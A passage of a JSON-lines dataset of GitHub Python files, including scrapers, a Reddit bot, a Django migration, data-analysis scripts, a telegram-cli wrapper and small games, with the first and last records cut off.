= f.read_text(encoding=\"utf-8\").replace(\" \", \" \").replace(\"​\", \" \").replace(\"། ། \", \"། །\")\n\n outpath = Path( \"output/sentences\") / f.parts[-2]\n outpath.mkdir(exist_ok=True)\n outfile = outpath / f.name\n if not outfile.is_file():\n print(outfile)\n t = Text(raw).custom_pipeline(\"basic_cleanup\", sent_tok, \"dummy\", plaintext_sent_par)\n print()\n outfile.write_text(t, encoding=\"utf-8\")\n","repo_name":"OpenPecha/nlp-dataset","sub_path":"sent_tok.py","file_name":"sent_tok.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24732348172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pttime', '0011_auto_20151214_0851'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='location',\n name='default_destination',\n field=models.BooleanField(default=False),\n ),\n ]\n","repo_name":"henrysingleton/timetomelbourne","sub_path":"pttime/migrations/0012_location_default_destination.py","file_name":"0012_location_default_destination.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41096726493","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom processrecipe import process_recipe\nimport random\n\nNUM_LINKS = 25 # Number of total links to crawl. Links will be obtained from each crawled page\nLINKS_PER_CRAWL = 2 # How many related links to store from each page\n\nprint(\"Warming up Selenium...\")\n# Set up Chrome driver\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\") # Run Chrome in headless mode\ndriver = webdriver.Chrome(executable_path='/path/to/chromedriver', options=chrome_options)\n\n# Navigate to the home page\nurl = 'https://realfood.tesco.com/'\nprint(f\"Accessing \\\"{url}\\\"...\")\ndriver.get(url)\n\nprint(\"Searching for promo links...\")\nlinks = []\n\nrecipes = [x.get_attribute(\"href\") for x in driver.find_elements(By.CLASS_NAME, \"hp-grid-carousel__link\")]\n\nrecipes2 = [x for x in recipes if x.startswith(url + \"recipes/\")]\n\nlinks.append(random.choice(recipes2))\n\nprint(\"Links found!\")\n\nrecipeInfo = []\n\ni = 0\nfailed_parses = 0\nwhile i < len(links):\n\tprint(f\"Processing recipe {i+1}/{NUM_LINKS + failed_parses}...\")\n\ttry:\n\t\trecipe = process_recipe(driver, links[i])\n\texcept:\n\t\ti += 1\n\t\tfailed_parses += 1\n\t\tcontinue\n\tif recipe[\"title\"] != \"Error\":\n\t\trecipeInfo.append(recipe)\n\t\tif len(recipeInfo) >= NUM_LINKS:\n\t\t\tbreak\n\telse:\n\t\tprint(\"Recipe not found\")\n\n\tls = list(recipe[\"promo_links\"])\n\tj = 0\n\twhile j < LINKS_PER_CRAWL:\n\t\trandoms = random.choice(ls)\n\t\tlinks.append(randoms)\n\t\tls.remove(randoms)\n\t\tj += 1\n\n\ti += 1\n\nTABLE_NAME = \"Recipes\" # Table to write values to\nSTARTING_ID = 25 # ID to start the RecipeID column at, this needs to be set correcly before and after every use\n\nwith open(\"recipes.sql\", \"w\") as file:\n\tfor recipe in recipeInfo:\n\t\tfile.write(\"INSERT INTO `{}` VALUES (\\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\", \\\"{}\\\");\\n\".format(TABLE_NAME, STARTING_ID, recipe[\"title\"], recipe[\"description\"], recipe[\"serving\"], recipe[\"time\"], recipe[\"calories\"], \"%%%\".join(recipe[\"ingredients\"]), \"%%%\".join(recipe[\"method\"]).strip(\"\\n\")))\n\t\tSTARTING_ID += 1\n\n# Close Chrome driver\ndriver.quit()\n\nprint(\"STARTING_ID Incremented to \" + str(STARTING_ID))\n\n\n","repo_name":"Samuels-Account/Recipe-Search-Scraping-Alogorithm","sub_path":"screenscraping.py","file_name":"screenscraping.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6198417744","text":"import praw\nimport time\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef run_bot(reddit):\n \n sub = reddit.subreddit(\"umanitoba\").new(limit = 20) #get the latest posts on the subreddit\n\n for post in sub: #looping through all the latest posts \n if (\"!find\" in post.selftext) and (not post.saved): # checking if the bot is called in that post and if the bot hasn't already replied \n reply_post(post)\n\n post.comments.replace_more(limit=None)\n for comment in post.comments.list(): #looping through all the comments (even replies to other comments)\n if (\"!find\" in comment.body) and (not comment.saved):\n reply_comment(comment)\n\n \n# not using sub.stream.comments() or sub.stream.submissions() as that will be much more complicated to check for both new comments and posts continuously\n# so it is best to do it manually and have the bot run once every certain minutes as the subreddit itself isn't very active\n\n\ndef reply_comment(comment):\n bot_request = comment.body.upper().split(\"!FIND\", 2)[1].strip() #get only the 2 words after !find which represent the course name & code\n request = bot_request.split(\" \") #separate the course name and code \n course_name = request[0].strip() \n course_code = request[1].strip()\n bot_reply = get_info(course_name, course_code)\n comment.reply(bot_reply + \"\\n\\n**BEEP BOP. I'm a bot. You can contact my creator [here](https://www.reddit.com/message/compose?to=CanadianSorryPanda&subject=&message=)**\")\n comment.save() # save the comment so the bot doesn't reply to it multiple times\n print(\"Replied to a comment\")\n \ndef reply_post(post):\n bot_request = post.selftext.upper().split(\"!FIND\", 2)[1].strip()\n request = bot_request.split(\" \")\n course_name = request[0].strip()\n course_code = request[1].strip()\n bot_reply = get_info(course_name, course_code)\n post.reply(bot_reply + \"\\n\\n**BEEP BOP. I'm a bot. You can contact my creator [here](https://www.reddit.com/message/compose?to=CanadianSorryPanda&subject=&message=)**\")\n post.save()\n print(\"Replied to a post\")\n \n \ndef login_bot(): \n \n reddit = praw.Reddit(client_id = \"\", \n client_secret = \"\",\n password = \"\",\n user_agent = \"\",\n username = \"\")\n return reddit\n\n\ndef get_info(course_name, course_code):\n \n url = \"http://crscalprod.ad.umanitoba.ca/Catalog/ViewCatalog.aspx?pageid=viewcatalog&topicgroupid=27309&entitytype=CID&entitycode=\" + course_name + \"+\" + course_code #get the database for the course name\n req = requests.get(url)\n soup = BeautifulSoup(req.content, 'html.parser')\n \n text_td = soup.find_all(\"td\", class_ = \"courseValueCell\") # get course information from the webpage and save the name, decription etc. as a list\n \n if not text_td: # if empty, this means the course name doesn't exist \n return \"Sorry, I couldn't find the course you were looking for :(\"\n \n else:\n name = \"*Course name:* \" + text_td[2].text \n faculty = \"*Faculty:* \" + text_td[4].text\n credit_hours = \"*Credit hours:* \" + text_td[1].text\n description = \"*Description:* \" + text_td[3].text\n \n return (name + \"\\n\\n\" + faculty + \"\\n\\n\" + credit_hours + \"\\n\\n\" + description)\n \n\ndef main(): \n \n reddit = login_bot()\n \n while True: \n try:\n run_bot(reddit)\n print(\"Sleeping\")\n time.sleep(120) # bot checks for new posts or comments once every 2 minutes\n except praw.exceptions.PRAWException as e:\n print(\"PRAW error: \" + str(e))\n print(\"Waiting\")\n time.sleep(600) # rest for 10 minutes if PRAW related error, longer wait-time is fine as the subreddit is not very active\n except Exception as e:\n print(\"Error: \" + str(e))\n break \n # if a non-PRAW error occurs then stop the program, if you want to run the bot indefinitely simply replace this line with time.sleep()\n \n\n\nif __name__ == \"__main__\": # for Python interpreter if you want to run the bot from there as a py file\n main()\n \n \nmain()\n \n \n","repo_name":"ArshSB/uManitoba-course-finder-reddit-bot","sub_path":"course_info_bot.py","file_name":"course_info_bot.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19712797447","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 10:08:26 2019\n\n@author: mazaror\nSecond part of the ETL\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport matplotlib.pyplot as plt\n\n#Import base created in ETL_1\ntablon = pd.read_pickle('C:/Users/mazaror/Documents/Respaldo Maro Zaror/Personal/Python/Proyectos/Futbol/base_v1.pkl')\ntablon = tablon[tablon['cant_jgos_h'] > 3]\ntablon.isnull().any()\ntablon[tablon['XXX'].isnull() == True].iloc[:10,:]\n\n#Add more advanced variables\ntablon['dif_ptos_x_part'] = tablon['ptos_loc_tot']/tablon['cant_jgos_h'] - tablon['ptos_vis_tot']/tablon['cant_jgos_a']\ntablon['dif_rend'] = tablon['ptos_loc_tot']/(tablon['cant_jgos_h']*3) - tablon['ptos_vis_tot']/(tablon['cant_jgos_a']*3)\ntablon['dif_locloc_visvis'] = tablon['ptos_loc_loc'] - tablon['ptos_vis_vis']\ntablon['dif_gol'] = tablon['dif_gol_loc'] - tablon['dif_gol_vis']\ntablon['difgol_locloc_visvis'] = tablon['dif_gol_loc_loc'] - tablon['dif_gol_vis_vis']\ntablon['dif_ptos_ls'] = tablon['ptos_h_last_season'] - tablon['ptos_a_last_season']\ntablon['dif_bal_cant'] = tablon['balance_cant_h'] - tablon['balance_cant_a']\ntablon['rat_bal'] = tablon['balance_h']/(tablon['balance_a'] + 1)\ntablon['rat_inv_x_jug'] = tablon['gasto_x_jug_h']/(tablon['gasto_x_jug_a'] + 1)\ntablon['rat_bal_2ls'] = tablon['balance_2ls_h']/(tablon['balance_2ls_a'] + 1)\ntablon['rat_inv_2ls'] = tablon['inv_2ls_h']/(tablon['inv_2ls_a'] + 1)\ntablon['dif_rend_ult5'] = tablon['rend_ult5_h'] - tablon['rend_ult5_a']\ntablon['rat_inv'] = tablon['inv_ls_h']/(tablon['inv_ls_a'] + 1)\n#tablon['rat_bal_ls'] = tablon['balance_ls_h']/(tablon['balance_ls_a'] + 1)\n\n\n#Select only the columns that show discriminative power\ntablon = tablon[['Season','HomeTeam','AwayTeam','FTR',\n 'dif_ptos_x_part','dif_rend','dif_locloc_visvis','dif_gol',\n 'difgol_locloc_visvis','ult_res', 'gan_ult3_h','dif_rend_ult5',\n 'dif_ptos_ls','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug',\n 'rat_inv_2ls','rat_inv','pbb_loc','pbb_draw','pbb_vis']]\n\ncolumns= ['FTR','dif_ptos_x_part','dif_rend','dif_locloc_visvis','dif_gol',\n 'difgol_locloc_visvis','ult_res', 'gan_ult3_h','dif_rend_ult5',\n 'dif_ptos_ls','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug',\n 'rat_inv_2ls','rat_inv','pbb_loc','pbb_draw','pbb_vis']\ntablon2 = tablon[columns]\n\n# A couple of extra analysis of the database\ntablon2.info()\ntablon2.groupby(by='FTR').mean()\ntablon2['FTR'].value_counts() #H 2.713 - A 1.627 - D 1.440\ncols = ['FTR','dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug','rat_inv']\ncols_elim = ['dif_bal_cant','rat_bal','rat_bal_2ls','rat_inv_x_jug','rat_inv']\n\ntab_test = tablon[cols]\ntab_test.boxplot('rat_bal', by= 'FTR')\ntab_test.hist('rat_bal', by= 'FTR', bins=20)\ntab_test.describe()\ntab_test = tab_test.drop('std_dif_bal_cant',axis=1)\nscaler = StandardScaler()\nscaler.fit(tab_test['rat_inv_x_jug'].reshape(-1,1))\ntab_test['std_rat_inv_x_jug'] = scaler.transform(tab_test['rat_inv_x_jug'].reshape(-1,1))\n\ntab_test2 = tab_test[(tab_test['std_rat_inv_x_jug'] > -2) & (tab_test['std_rat_inv_x_jug'] < 2)]\ntab_test.groupby('FTR').mean()\n\n\ntablon = tablon.drop(cols_elim, axis=1)\n \ntablon3.describe()\ntablon3.groupby('FTR').mean()\n\ntablon2.to_pickle('C:/Users/mazaror/Documents/Respaldo Maro Zaror/Personal/Python/Proyectos/Futbol/base_v2.pkl')","repo_name":"MarcoZaror/predict_soccer_results","sub_path":"ETL_2.py","file_name":"ETL_2.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29290370356","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef bar_charts(bar_6, bar_5, bar_4, x_label, y_label):\n\n # Numbers of pairs of bars you want\n N = 6\n\n # Data on X-axis\n\n ind = np.arange(N)\n\n plt.figure()\n\n # Width of a bar \n width = 0.1 \n\n # Plotting\n plt.bar(ind, bar_6 + bar_5 + bar_4 , width, edgecolor='k', label='4-segments')\n \n plt.bar(ind + width, bar_5 + bar_6, width, edgecolor='k', label='5-segments')\n plt.bar(ind + width + width, bar_6 , width, edgecolor='k', label='6-segments') \n #plt.bar(ind + width + width + width, bar_4, width, label='4-segments')\n\n plt.xlabel('Luminosity (nA)')\n plt.ylabel('Tracks reconstructed (%)')\n\n # First argument - A list of positions at which ticks should be placed\n # Second argument - A list of labels to place at the given locations\n plt.xticks(ind + width + width / 2 , ('45', '50', '55', '90', '100', '110'))\n plt.yticks(np.arange(0, 1.1, 0.10))\n plt.ylim([0,1])\n\n # Position legend\n plt.legend(bbox_to_anchor=(0, 1, 1, 0), loc=\"lower left\", mode=\"expand\", ncol=4)\n plt.tight_layout()\n # plt.savefig(filename)\n\n\n\nmodels = [] \nall_hits = []\nall_hits_err = []\nall_init_noise = []\nall_rec_noise = []\nall_rec_noise_err = []\nall_rec_6 = []\nall_rec_5 = []\nall_rec_4 = []\nfor p in [\"45\", \"50\", \"55\", \"90\",\"100\",\"110\"]:\n models.append(p)\n curr_dir = p+\"/testing_report.txt\" \n line = 0\n with open(curr_dir, 'r') as file:\n for line in file:\n if \"Reconstructed from 6 superlayers(%):\" in line:\n all_rec_6.append( float(line.split(\": \")[1])/100)\n elif \"Reconstructed from 5 superlayers(%):\" in line:\n all_rec_5.append( float(line.split(\": \")[1])/100)\n elif \"Reconstructed from 4 superlayers(%):\" in line:\n all_rec_4.append( float(line.split(\": \")[1])/100)\nbar_charts(np.array(all_rec_6), np.array(all_rec_5), np.array(all_rec_4), None, None)\n# plt.show()\nplt.savefig('../segments_reconstruction.png')\nplt.figure()","repo_name":"gavalian/clas12ai","sub_path":"path_denoise_2d/experiments/luminosity_studies/plot_segments.py","file_name":"plot_segments.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38760300048","text":"\"\"\"\nProject 3: Book Recommendations GUI\nStudent: Tri Trang\nI declare that the following source code was written solely by me.\nI understand that copying any source code, in whole or in part, constitutes\ncheating, and that I will receive a zero on this project if I am found in violation of this policy.\n\"\"\"\nfrom breezypythongui import EasyFrame\nfrom bookrecs import *\n\n\nclass BookRecs(EasyFrame):\n def __init__(self):\n super().__init__(title=\"Book Recommendation\", width=300, height=100, background=\"#B0E0E6\", resizable=True)\n self.name = \"\"\n self.report = \"\"\n self.btn_find_friend = self.addButton(text=\"Friend\", row=0, column=0, command=self.get_person)\n self.btn_recommend = self.addButton(text=\"Recommend\", row=0, column=1, command=self.get_recommendation)\n self.btn_get_report = self.addButton(text=\"Report\", row=0, column=2, command=self.get_all_recommendations)\n\n def get_person(self):\n self.name = self.prompterBox(title=\"Friend\", promptString=\"Enter Reader Name: \").lower()\n if self.name in readers:\n friends = get_two_friends(self.name)\n name_friends = \"\\n\".join([friend[0].title() for friend in friends])\n\n self.messageBox(title=f\"Friends of {self.name.title()}\", message=f\"{name_friends}\", width=50, height=10)\n else:\n self.messageBox(title=\"Error\", message=\"No such reader.\")\n\n def get_recommendation(self):\n self.name = self.prompterBox(title=\"Friend\", promptString=\"Enter Reader Name: \").lower()\n if self.name in readers:\n recommended_books = recommend(self.name, reader_ratings)\n books = \"\\n\".join([book[0] + \", \" + book[1] for book in recommended_books])\n self.messageBox(title=f\"Recommendations for {self.name.title()}\", message=f\"{books}\", width=50, height=10)\n else:\n self.messageBox(title=\"Error\", message=\"No such reader.\")\n\n def get_all_recommendations(self):\n for person in readers:\n friends = get_two_friends(person)\n recommended_books = recommend(person, reader_ratings)\n books = \"\\n \".join([book[0] + \", \" + book[1] for book in recommended_books])\n self.report += f\"\"\"Recommendations for {person.title()} from {friends[0][0].title()} and {friends[1][0].title()}:\n {books}\n \n\"\"\"\n self.messageBox(title=\"Report\", message=f\"{self.report}\", width=100, height=70)\n\n\ndef main():\n BookRecs().mainloop()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"tritrang/FirstRepo","sub_path":"Projects/Project 3/GUIBookRecs.py","file_name":"GUIBookRecs.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20052563344","text":"'''A sentence is a list of words that are separated by a single space with no leading or trailing spaces. Each word consists of lowercase and uppercase English letters.\n\nA sentence can be shuffled by appending the 1-indexed word position to each word then rearranging the words in the sentence.\n\nFor example, the sentence \"This is a sentence\" can be shuffled as \"sentence4 a3 is2 This1\" or \"is2 sentence4 This1 a3\".\nGiven a shuffled sentence s containing no more than 9 words, reconstruct and return the original sentence.\n\nExample 1:\n\nInput: s = \"is2 sentence4 This1 a3\"\nOutput: \"This is a sentence\"\nExplanation: Sort the words in s to their original positions \"This1 is2 a3 sentence4\", then remove the numbers.'''\n\n# TC = O(N)\n\n\ndef sortSentence(self, s: str) -> str:\n words = s.split()\n n = len(words)\n\n sent = [None] * n\n\n for i in range(n):\n sent[int(words[i][-1]) - 1] = words[i][:-1]\n\n return \" \".join(sent)\n\n\ndef sortSentence(self, s: str) -> str:\n\n dic = {}\n for i in s.split():\n dic[i[-1]] = i[:-1]\n\n final = []\n for num, word in sorted(dic.items()):\n final.append(word)\n return \" \".join(final)\n\n# (runtime / memory)\n# 24 ms / 14.3 MB\n\n\ndef sortSentence(self, s: str) -> str:\n\n dic = {}\n for i in s.split():\n dic[i[-1]] = i[:-1]\n\n final = [word for num, word in sorted(dic.items())]\n return \" \".join(final)\n\n# (runtime / memory)\n# 28 ms / 14.4 MB\n\n\ndef sortSentence(self, s: str) -> str:\n\n words = s[::-1].split()\n result = [word[1:][::-1] for word in sorted(words)]\n return ' '.join(result)\n\n# (runtime / memory)\n# 32 ms / 14.1 MB\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"String/Easy/Sorting the Sentence.py","file_name":"Sorting the Sentence.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35819707716","text":"from flask import *\nfrom api.db import *\nfrom random import sample\n\nrouter_page_nav = Blueprint(\"router_page_nav\", __name__, template_folder=\"templates\")\n\n@router_page_nav.route(\"/api/nav\")\ndef navData():\n data = openJson(\"activity\")\n data_list = []\n for i in range(0,len(data)):\n activityName = data[i][\"ActivityName\"]\n city = data[i][\"City\"]\n result = city+\":\"+activityName\n data_list.append(result)\n\n random_data=sample(data_list, 30)\n\n return random_data\n","repo_name":"Ben10225/lets_travel_group5","sub_path":"api/nav.py","file_name":"nav.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8544062707","text":"import requests\r\n\r\n\r\n\r\ndef roulette():\r\n result = {\"빨노\" : \"\", \"언오\" : \"\", \"홀짝\" : \"\", \"회차\" : \"\"}\r\n response = requests.get('https://bepick.net/live/result/y_roulette?', headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'})\r\n req = response.json()\r\n\r\n result[\"회차\"] = req['round']\r\n\r\n if req['fd1'] == \"1\":\r\n result[\"빨노\"] = \"빨\"\r\n if req['fd1'] == \"2\":\r\n result[\"빨노\"] = \"노\"\r\n\r\n if req['fd2'] == \"1\":\r\n result[\"언오\"] = \"언\"\r\n if req['fd2'] == \"2\":\r\n result[\"언오\"] = \"오\"\r\n\r\n if req['fd3'] == \"1\":\r\n result[\"홀짝\"] = \"홀\"\r\n if req['fd3'] == \"2\":\r\n result[\"홀짝\"] = \"짝\"\r\n\r\n return result\r\n\r\n\r\ndef roulette_time():\r\n req = requests.get('https://bepick.net/json/game/y_roulette.json?', headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'})\r\n return req.json()['time_set']['nextTime'] + 1\r\n\r\n\r\n","repo_name":"simon9428x/Discord-Casino-Gaming-Bot","sub_path":"util/roulette.py","file_name":"roulette.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22880756716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport time\nimport json\nimport socket\nimport shutil\nimport signal\nimport logging\nimport tempfile\nimport threading\nimport subprocess\n\n'''\ntgcli.py - Library to interact with telegram-cli.\nCopyright (C) 2015-2016 Dingyuan Wang\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Lesser General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public\nLicense along with this program. If not, see\n.\n'''\n\ntg_server_pub = '''-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAwVACPi9w23mF3tBkdZz+zwrzKOaaQdr01vAbU4E1pvkfj4sqDsm6\nlyDONS789sVoD/xCS9Y0hkkC3gtL1tSfTlgCMOOul9lcixlEKzwKENj1Yz/s7daS\nan9tqw3bfUV/nqgbhGX81v/+7RFAEd+RwFnK7a+XYl9sluzHRyVVaTTveB2GazTw\nEfzk2DWgkBluml8OREmvfraX3bkHZJTKX4EQSjBbbdJ2ZXIsRrYOXfaA+xayEGB+\n8hdlLmAjbCVfaigxX0CDqWeR1yFL9kwd9P0NsZRPsmoqVwMbMu7mStFai6aIhc3n\nSlv8kg9qv1m6XHVQY3PnEw+QQtqSIXklHwIDAQAB\n-----END RSA PUBLIC KEY-----\n'''\n\nlogger = logging.getLogger('tgcli')\nlogger.setLevel(logging.INFO)\ndo_nothing = lambda *args, **kwargs: None\n\ndef preexec_ignore_sigint():\n '''\n Ignore the SIGINT signal by setting the handler to the standard\n signal handler SIG_IGN.\n '''\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\nclass TelegramCliExited(RuntimeError):\n pass\n\nclass TelegramCliInterface:\n def __init__(self, cmd, extra_args=(), run=True, timeout=60, ignore_sigint=True):\n self.cmd = cmd\n self.extra_args = tuple(extra_args)\n self.proc = None\n self.sock = None\n self.buffer = b''\n self.ready = threading.Event()\n self.closed = False\n self.thread = None\n self.tmpdir = tempfile.mkdtemp()\n self.timeout = timeout\n self.ignore_sigint = ignore_sigint\n # Event callbacks\n # `on_info`, `on_json` and `on_text` are for stdout\n self.on_info = logger.info\n self.on_json = logger.debug\n self.on_text = do_nothing\n self.on_start = lambda: logger.info('Telegram-cli started.')\n self.on_exit = lambda: logger.warning('Telegram-cli died.')\n if run:\n self.run()\n\n def _get_pubkey(self):\n tgdir = os.path.abspath(os.path.join(os.path.dirname(\n os.path.realpath(self.cmd)), '..'))\n paths = [\n os.path.join(tgdir, 'tg-server.pub'),\n os.path.join(tgdir, 'server.pub'),\n '/etc/telegram-cli/server.pub',\n '/usr/local/etc/telegram-cli/server.pub',\n os.path.join(self.tmpdir, 'tg-server.pub')\n ]\n for path in paths:\n if os.path.isfile(path):\n return path\n else:\n with open(path, 'w') as f:\n f.write(tg_server_pub)\n return path\n\n def checkproc(self):\n if self.closed or self.proc and self.proc.poll() is None:\n return self.proc\n sockfile = os.path.join(self.tmpdir, 'tgcli.sock')\n if os.path.exists(sockfile):\n os.unlink(sockfile)\n self.proc = subprocess.Popen((self.cmd, '-k', self._get_pubkey(),\n '--json', '-R', '-C', '-S', sockfile) + self.extra_args,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n preexec_fn=preexec_ignore_sigint if self.ignore_sigint else None)\n while not os.path.exists(sockfile):\n time.sleep(0.5)\n self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.sock.connect(sockfile)\n return self.proc\n\n def _run_cli(self):\n while not self.closed:\n self.checkproc()\n try:\n while not self.closed:\n out = self.proc.stdout.readline().decode('utf-8')\n if not out:\n break\n elif not self.ready.is_set():\n self.on_start()\n self.ready.set()\n self.on_text(out)\n if out[0] in '[{':\n try:\n self.on_json(json.loads(out.strip()))\n except ValueError:\n self.on_info(out.strip())\n else:\n self.on_info(out.strip())\n except BrokenPipeError:\n pass\n finally:\n try:\n self.sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n if self.proc and self.proc.poll() is None:\n self.proc.terminate()\n self.proc.wait()\n self.ready.clear()\n self.on_exit()\n\n def run(self):\n self.thread = threading.Thread(target=self._run_cli)\n self.thread.daemon = True\n self.thread.start()\n self.ready.wait()\n\n def restart(self):\n self.close()\n self.closed = False\n self.tmpdir = tempfile.mkdtemp()\n self.run()\n\n def close(self):\n if self.closed:\n return\n self.closed = True\n self.ready.clear()\n try:\n self.proc.wait(2)\n except subprocess.TimeoutExpired:\n self.proc.kill()\n if self.thread:\n self.thread.join(1)\n if os.path.isdir(self.tmpdir):\n shutil.rmtree(self.tmpdir, True)\n self.tmpdir = None\n\n def __enter__(self):\n if not self.thread:\n self.run()\n self.ready.wait()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def __del__(self):\n self.close()\n\n def _readline(self):\n while self.ready.is_set():\n lines = self.buffer.split(b'\\n', 1)\n if len(lines) > 1:\n self.buffer = lines[1]\n return lines[0] + b'\\n'\n else:\n self.buffer += self.sock.recv(1024)\n # usually there is an assertion error\n raise TelegramCliExited('telegram-cli unexpectedly exited.')\n\n def send_command(self, cmd, timeout=None, resync=True):\n '''\n Send a command to tg-cli.\n use `resync` for consuming text since last timeout.\n '''\n logger.debug(cmd)\n self.ready.wait()\n self.sock.settimeout(timeout or self.timeout)\n self.sock.sendall(cmd.encode('utf-8') + b'\\n')\n line = self._readline()\n while resync and not line.startswith(b'ANSWER '):\n line = self._readline()\n size = int(line[7:].decode('ascii'))\n reply = b''\n while len(reply) < size:\n reply += self._readline()\n ret = reply.decode('utf-8')\n try:\n return json.loads(ret)\n except ValueError:\n return ret\n\n def __getattr__(self, name):\n '''\n Convenience command calling: cmd_*(*args, **kwargs)\n `args` are for the tg-cli command\n `kwargs` are for `send_command`\n '''\n if name.startswith('cmd_'):\n fn = lambda *args, **kwargs: self.send_command(\n ' '.join(map(str, (name[4:],) + args)), **kwargs)\n return fn\n else:\n raise AttributeError('TelegramCliInterface has no attribute %r' % name)\n\nif __name__ == \"__main__\":\n import sys\n logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO)\n with TelegramCliInterface(sys.argv[1]) as tgcli:\n for ln in sys.stdin:\n try:\n cmd = ln.strip()\n print(tgcli.send_command(cmd))\n except Exception:\n logging.exception('Failed to execute: ' + cmd)\n","repo_name":"gumblex/tg-export","sub_path":"tgcli.py","file_name":"tgcli.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"40332874153","text":"import random\n#import main\nimport utilFunctions\n\n#############################################################################\n#################### GAME FUNCTIONS ############################################\n#############################################################################\n\n\ndef tirage_des():\n \"\"\"Fonction qui simule un lancer de trois dés\"\"\"\n L=[]\n for i in range(3):\n L.append(random.randint(1,6))\n return(L)\n\n\n\ndef rec_main(tirage):\n \"\"\"fonction qui donne le score de la main actuelle, suivant le modèle suivant\n Type de main | Score\n 111 -> 13\n 666 -> 12\n 555 -> 11\n 444 -> 10\n 333 -> 9\n 222 -> 8\n {456} -> 7\n {bAb} -> A (de 6 a 1)\n {123} -> 0\n {ABC} -> -404\n \"\"\"\n nbDesIdentiques=0\n for i in range(1,7):\n if(tirage.count(i)>nbDesIdentiques):\n nbDesIdentiques=tirage.count(i)\n valeurDe=i\n\n if(nbDesIdentiques==3)&(valeurDe==1):\n return(13)\n\n elif (nbDesIdentiques==3):\n return(6+valeurDe)\n\n elif (nbDesIdentiques ==2):\n for elem in tirage:\n if(elem != valeurDe):\n return(elem)\n\n elif (4 in tirage) & (5 in tirage) & (6 in tirage):\n return(7)\n\n elif (1 in tirage) & (2 in tirage) & (3 in tirage):\n return(0)\n else:\n return(-404)\n\n\n\n\ndef rec_jeu():\n \"\"\"fonction qui réalise les trois lancers autorisés, et qui renvoie le premier score obtenu\"\"\"\n for i in range(2): #on ne realise que deux lancers d'abord, car on renverra forcement le score du troisième\n main=tirage_des()\n input(utilFunctions.centerText(\"Lancer {} : {}\".format(i+1,main)))\n if (rec_main(main)!=-404): #si on a rien obtenu, on est autorisé a relancer, mais si on a ne serait-ce que 0 points, on doit le garder\n print(utilFunctions.centerText(\"{} donne un score de {} au Cee-Lo !\".format(main,rec_main(main))))\n return(rec_main(main))\n\n main=tirage_des()\n input(utilFunctions.centerText(\"Lancer 3 : {}\".format(main)))\n 